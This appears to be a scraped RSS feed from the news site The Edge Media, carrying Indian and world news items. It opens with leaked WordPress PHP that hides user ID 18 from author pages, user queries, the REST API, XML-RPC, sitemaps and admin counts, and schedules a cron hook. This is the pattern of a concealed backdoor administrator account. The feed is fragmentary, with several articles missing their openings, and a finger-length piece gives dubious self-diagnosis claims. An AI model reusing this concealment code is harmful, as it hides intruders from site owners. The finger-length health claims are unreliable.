add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Sarla Maheshwari Passes Away at 71, The End of a Distinguished Voice appeared first on The Edge Media.
]]>The news of her death prompted an outpouring of grief from colleagues, political leaders, journalists, and viewers across the country. Many took to social media to remember her as a symbol of credibility and grace in Indian news broadcasting. Admirers recalled how her composed presence and precise diction made her one of the most trusted faces on television.
Sarla Maheshwari began her career as a news presenter in 1976. At a time when television was still evolving in India, she quickly established herself as a dependable and dignified anchor. In 1982, she joined Doordarshan, the national broadcaster, where she was entrusted with reading major news bulletins. Her association with the channel continued for over two decades, and she remained active in news presentation until 2005.
Throughout her career, she became synonymous with Doordarshan’s identity. Her delivery style was marked by restraint, clarity, and authority, qualities that helped shape the standards of television news in the country. She was regarded as one of the prominent voices of Indian broadcasting during a period when Doordarshan was the primary source of televised news for millions.
Colleagues from the media fraternity described her as disciplined, knowledgeable, and deeply committed to journalism. Several former news readers and media professionals expressed their sorrow, calling her a mentor figure who set high benchmarks for professionalism.
Her contribution to Indian television journalism extended beyond reading news. She represented a generation of anchors who brought dignity and seriousness to the medium, helping to build public trust in televised news.
With her passing, Indian broadcasting has lost one of its most respected pioneers. Sarla Maheshwari’s calm voice and dignified presence will continue to be remembered by audiences who associated her with reliability and authenticity in news reporting.
The post Sarla Maheshwari Passes Away at 71, The End of a Distinguished Voice appeared first on The Edge Media.
]]>The post The Science of Finger Length and Brain Development appeared first on The Edge Media.
]]>
The study, which involved research on 225 young children, found that boys with longer index fingers tended to have a larger head circumference. A larger head circumference is often associated with a brain that develops rapidly. This discovery suggests that specific developmental traits are established even before birth.
The length of the fingers depends on which hormones are more prevalent before birth. While a larger brain is often seen as a sign of quick intelligence and good memory, researchers noted that evolution played a role over millions of years as the human body adapted. Interestingly, while high estrogen levels might lead to a larger brain, it can also mean the body may have to work harder to fight certain diseases in the future.
How to check yourself:
* If your first finger (index) is long, your brain may have grown very rapidly during childhood.
* If your ring finger is longer, it may indicate a natural aptitude for sports or high-intensity physical activities.
* Your fingers are essentially a small “report card” of your biological development.
The post The Science of Finger Length and Brain Development appeared first on The Edge Media.
]]>The post Tragic High School Shooting in British Columbia Leaves 10 Dead and Over 25 Injured appeared first on The Edge Media.
]]>
Public Safety Minister Mike Farnworth described the incident as heart-wrenching and assured that the government would provide all necessary support to the victims. Following the incident, an emergency alert was issued but later lifted once police confirmed there were no other suspects at large. Elementary and secondary schools in the Tumbler Ridge area have been closed for the remainder of the week.
Prime Minister Narendra Modi expressed deep grief over the incident in North America, sending condolences to Canadian Prime Minister Mark Carney and the families of the victims. He stated that India stands in solidarity with the people of Canada during this difficult time and wished a speedy recovery to those injured.
The post Tragic High School Shooting in British Columbia Leaves 10 Dead and Over 25 Injured appeared first on The Edge Media.
]]>The post “Pakistan has failed to learn from its past mistakes.” - Khwaja Asif appeared first on The Edge Media.
]]>The Minister stated that re-engaging with the United States after 2001 was a significant error that resulted in long-term damage to Pakistan. He argued that the support for the US in the Afghanistan conflict was driven by a desire for political legitimacy and superpower backing rather than religious or national necessity, and the country has been suffering the consequences for decades.
Asif also pointed inward, stating that Pakistan has failed to learn from its past mistakes. He noted that following the withdrawal of Soviet forces from Afghanistan, the nation did not adjust its course, leading it to “rent itself out” for another two decades after the September 11 attacks. He attributed the rise of terrorism and extremism to the decisions made by past military dictators, specifically mentioning Zia-ul-Haq and Pervez Musharraf, whom he accused of pushing the country into foreign wars that damaged the economy and society.
Furthermore, the Defense Minister highlighted that none of the perpetrators of the 9/11 attacks were Afghan, yet Pakistan became embroiled in the ensuing war, a decision he believes severely compromised national security and foreign policy.
The post “Pakistan has failed to learn from its past mistakes.” - Khwaja Asif appeared first on The Edge Media.
]]>The post Opposition Moves No-Confidence Motion Against Lok Sabha Speaker Om Birla appeared first on The Edge Media.
]]>The opposition has leveled serious allegations against the Speaker, primarily focusing on the suppression of the Leader of the Opposition’s voice during the Motion of Thanks on the President’s Address and the forced suspension of eight members. In response to these developments, sources indicate that Om Birla has decided on ethical grounds not to occupy the Speaker’s chair until the matter is resolved.
The Lok Sabha Secretariat has confirmed that proceedings will follow established rules. The notice was handed over to Secretary General Utpal Kumar Singh by a delegation including Congress Deputy Leader Gaurav Gogoi, Chief Whip K. Suresh, and MP Mohammad Javed, among others. While members from the Congress, SP, DMK, and RJD have signed the notice, notable absences include the signatures of Rahul Gandhi and members of the TMC.
Four Major Allegations by the Opposition:
* February 2: Opposition leader Rahul Gandhi was allegedly prevented from completing his speech during the Motion of Thanks on the President’s Address.
* February 3: Eight MPs were suspended for the remainder of the session, a move the opposition describes as punishment for exercising democratic rights.
* Nishikant Dubey Case: The notice mentions objectionable remarks made against former Prime Ministers without naming Nishikant Dubey.
* Misuse of Office: The opposition rejected the Speaker’s claim that Congress members intended to cause an “untoward incident” near the Prime Minister’s seat, calling such accusations a blatant misuse of a constitutional position.
The post Opposition Moves No-Confidence Motion Against Lok Sabha Speaker Om Birla appeared first on The Edge Media.
]]>The post Strict Crackdown on Cyber Fraud, Says Amit Shah appeared first on The Edge Media.
]]>Shah was addressing a conference organized with the support of the Ministry of Home Affairs and the Indian Cyber Crime Coordination Centre. He stated that the mule account detection system developed by the ministry should be adopted by all banks to prevent misuse of financial channels by criminals.
Highlighting the growing threat, the Home Minister said that in the country one person falls victim to cyber fraud every 37 seconds. On average, about 90 individuals are cheated every hour. As digital transactions continue to rise rapidly, the risk associated with cyber crimes is also increasing. He noted that these crimes are emerging in an organized manner and criminals are adopting new technologies, making collective action essential.
Shah also instructed police officials to ensure adequate staffing at the 1930 cyber helpline call centers so that complaints can be handled promptly and effectively.
In a separate development, the central government has tightened regulations for social media platforms. Under the new rules, any photo or video created using artificial intelligence must carry a clear label indicating that it is AI generated. If any unlawful or misleading content is uploaded on these platforms, companies will be required to remove it within three hours of receiving information about it.
The new regulations will come into effect from February 20. Non compliance may invite strict action and financial penalties. The government stated that these measures aim to enhance transparency, prevent misuse of technology and strengthen the country’s cyber security framework.
The post Strict Crackdown on Cyber Fraud, Says Amit Shah appeared first on The Edge Media.
]]>The post Assistant Commissioner Among Two Suspended in Hamirpur Industry Office Bribery Case appeared first on The Edge Media.
]]>The action follows a detailed inquiry conducted under the supervision of the District Magistrate. The investigation revealed that beneficiaries were allegedly forced to pay money through middlemen and departmental staff to avail themselves of benefits under different schemes.
According to the findings, beneficiaries were provided tool kits only after depositing half of the sanctioned amount in advance. Complaints suggested that money was being collected in the name of facilitating loans and subsidies under the Chief Minister Self Employment Scheme at the District Industry Centre.
After receiving complaints, District Magistrate Ghanshyam Meena constituted a joint inquiry team of the Chief Development Officer and the Additional District Magistrate. The probe confirmed the involvement of Ravi Verma and Santosh Rao in the irregularities. Following submission of the report, the government ordered their suspension on Monday and directed disciplinary proceedings against them.
In the same matter, District Manager Milan Kumar has already been dismissed from service. The investigation further indicated that the three officials acted in collusion and the alleged malpractice had reportedly been continuing for nearly five years.
The post Assistant Commissioner Among Two Suspended in Hamirpur Industry Office Bribery Case appeared first on The Edge Media.
]]>The post Uttar Pradesh Economy Doubles in Nine Years, Claims Yogi Government appeared first on The Edge Media.
]]>According to the report, the state’s Gross State Domestic Product was around Rs 13.30 lakh crore in 2016 to 17. It increased steadily over the years and reached approximately Rs 30.25 lakh crore in 2024 to 25. For the financial year 2025 to 26, the economy is projected to cross Rs 36 lakh crore. The report highlighted that Uttar Pradesh has emerged as one of the fastest growing state economies in the country.
The Economic Review also pointed to consistent improvement in growth rates. The state’s growth rate, which was around 8.6 percent in 2016 to 17, is estimated to have risen to 9.1 percent in 2024 to 25. The government said that this reflects sustained economic expansion and better financial management.
Among the key highlights of the review, the per capita income in 2025 to 26 is expected to reach around Rs 1,20,000. The government said that efforts are being made to ensure balanced development across agriculture, industry and the service sector. It added that investment in infrastructure, digital economy and green energy has been prioritised to strengthen long term growth.
The report mentioned that the Ayodhya airport has been made operational and five international airports are expected to be functional in the state, further boosting connectivity and economic activity. Measures have also been taken to improve ease of doing business and attract private investment.
Before the start of the Budget Session, Chief Minister Yogi Adityanath said that this is the tenth Budget of his government and reflects the aspirations of the people. He stated that dialogue and coordination among departments are essential for effective governance and development.
Governor Anandiben Patel, in her address to the joint session of the Legislature, described Uttar Pradesh as a Breakthrough State. She said that over the past nine years, the state has moved beyond its earlier image and is now being recognised for effective law and order, economic reforms, agricultural progress, women empowerment and infrastructure development.
The Governor added that the government’s policies, administrative efficiency and focus on development have strengthened public confidence. She also said that the law and order situation in the state now meets national standards and has contributed to attracting investment.
The Economic Review further noted that per capita income, which stood at around Rs 54,564 in 2016 to 17, increased to nearly Rs 1,09,844 in 2024 to 25. It is projected to cross Rs 1,20,000 in 2025 to 26. Urbanisation is also rising steadily, with the share of the urban population expected to increase significantly by 2046.
The government emphasised that its focus remains on employment generation, inclusive growth and making Uttar Pradesh self reliant while strengthening its position as a major economic power in the country.
The post Uttar Pradesh Economy Doubles in Nine Years, Claims Yogi Government appeared first on The Edge Media.
]]>The post Accused in Ram Temple Attack Conspiracy Killed Inside Neemka Jail appeared first on The Edge Media.
]]>Nuh SP Ashok Kumar Verma addressed the media on Monday and stated that a dispute broke out inside a barrack of Neemka Jail on Sunday night. During the altercation, another inmate, identified as Arun Chaudhary, allegedly attacked Rahman with a stone around 2 am. Rahman sustained serious head injuries. He was immediately taken to the jail hospital for primary treatment, where he succumbed to his injuries.
Rahman had been arrested last year by Gujarat and Palwal police from Pali village in March. Authorities said he was earlier apprehended from a farmhouse in Faridabad. He was allegedly hiding there under the name Shankar. At the time of his arrest, police had recovered two hand grenades, detonators and other materials from him.
Following news of Rahman’s death, his father left Ayodhya on Monday to collect his son’s body from Faridabad. The family is expected to return on Tuesday. Rahman was a resident of Mughalai Bazaar.
Police officials stated that Arun Chaudhary has several criminal cases registered against him in Jammu and Kashmir, including charges of murder and attempt to murder. He was transferred from Kathua Jail to Neemka Jail in 2024. Another accused named Yakub Riaz was also present in the same barrack at the time of the incident.
A murder case has been registered against Arun Chaudhary. Police said he will soon be taken on production warrant for further questioning as the investigation continues.
The post Accused in Ram Temple Attack Conspiracy Killed Inside Neemka Jail appeared first on The Edge Media.
]]>The post New Zealand Clinch Victory Over Afghanistan in Champions Trophy Opener appeared first on The Edge Media.
]]>Afghanistan, after being invited to bat, posted a fighting total of 183 runs. Rahmanullah Gurbaz played a steady knock of 27 runs, while Ibrahim Zadran and Rahmat Shah tried to build partnerships in the middle overs. However, the Afghan batting lineup struggled against disciplined bowling from New Zealand.
Lockie Ferguson and Matt Henry kept the pressure on with sharp pace and accurate lines. Ferguson struck crucial blows in the middle overs, while Henry provided early breakthroughs. Their combined effort restricted Afghanistan to a modest total despite brief resistance from the lower order.
In response, New Zealand approached the chase calmly. Will Young anchored the innings with a composed 65 off 42 balls, striking seven fours and three sixes. His positive intent ensured that the required run rate never became a concern.
Tom Latham supported him brilliantly, scoring a fluent 74. He rotated the strike effectively and punished loose deliveries, guiding the innings through the middle phase. The pair built a crucial partnership that shifted the momentum firmly in New Zealand’s favor.
Although Afghanistan’s bowlers managed to pick up a few wickets and attempted to apply pressure with tight spells, the target proved insufficient. The New Zealand batters maintained control and completed the chase comfortably with five wickets in hand.
The victory provides New Zealand with a strong start to the tournament and boosts their confidence ahead of tougher encounters. Afghanistan showed flashes of promise but will need greater consistency with both bat and ball to challenge top sides in the competition.
The post New Zealand Clinch Victory Over Afghanistan in Champions Trophy Opener appeared first on The Edge Media.
]]>